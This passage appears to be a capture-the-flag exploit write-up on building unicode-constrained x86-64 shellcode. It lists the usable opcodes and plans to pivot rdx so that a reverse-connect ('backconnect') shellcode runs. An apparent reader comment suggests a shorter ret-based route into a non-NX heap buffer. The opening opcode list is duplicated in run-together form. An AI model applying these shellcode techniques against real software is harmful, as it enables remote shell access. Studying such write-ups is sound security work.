1. We can do all kinds of arithmetics with al,eaxand[rax]:2000and[rax],al
2B 00subeax,[rax]3400xoral,0
<...>
All of that is for the most part useless: both operands
refer to parts of rax,and arithmetics work with 0.2. We can pushandpop virtually any register!
50pushrax54pushrsp59poprcx
5E poprsi
<...>
That means we can freely get any values from stack,and also mov registers from one to another.
Also we can push0:)
6A 00push03. We can dereference a dword:6300movsxdeax,dword ptr [rax]4. We can do dereferenced addition with all kinds of registers:00 2A add[rdx],ch005300add[rbx+0],dl
<....>

1. We can do all kinds of arithmetics with al, eax and [rax]:
20 00 and [rax], al
2B 00 sub eax, [rax]
34 00 xor al, 0
<...>
All of that is for the most part useless: both operands
refer to parts of rax, and arithmetics work with 0.
2. We can push and pop virtually any register!
50 push rax
54 push rsp
59 pop rcx
5E pop rsi
<...>
That means we can freely get any values from stack,
and also mov registers from one to another.
Also we can push 0 :)
6A 00 push 0
3. We can dereference a dword:
63 00 movsxd eax, dword ptr [rax]
4. We can do dereferenced addition with all kinds of registers:
00 2A add [rdx], ch
00 53 00 add [rbx+0], dl
<....>

… and that’s actually pretty much it.

So what can we do with those opcodes to execute our fancy backconnect shellcode?

Prerequisites

When our shellcode is being invoked, we have two very userful prerequisites to consider:

1. rdx points to the buffer with our shellcode (shellcode is executed with call rdx)

2. When the execution of shellcode starts, [esp+0x1C] contains the length of original, non-unicoded string.

The plan is:

1. Get rdx pointing to the end of the shellcode

2. Write our backconnect there.

This way, when unicoded shellcode finishes its execution, backconnect shellcode is taking over immediately and we don’t have to worry about that. Also, that’s the only way :) We don’t have a jmp or a ret.

Oh that rich opcode variety

Let’s improvise with what we have and make rdx point to the end of the shellcode buffer.

actually that is not the only way… the binary doesn’t have NX. so the memory allocated with malloc has RWX permission. and when the execution of shellcode starts, [esp+0x20] contains the pointer of malloc buffer. so you just need to generate the single byte of return(C3) code at the back of unicode shellcode(much simpler than generating entire backconnect shellcode) and adjust ESP to point mallocbuffer + X. in this way you need less then 400 bytes for exploit payload.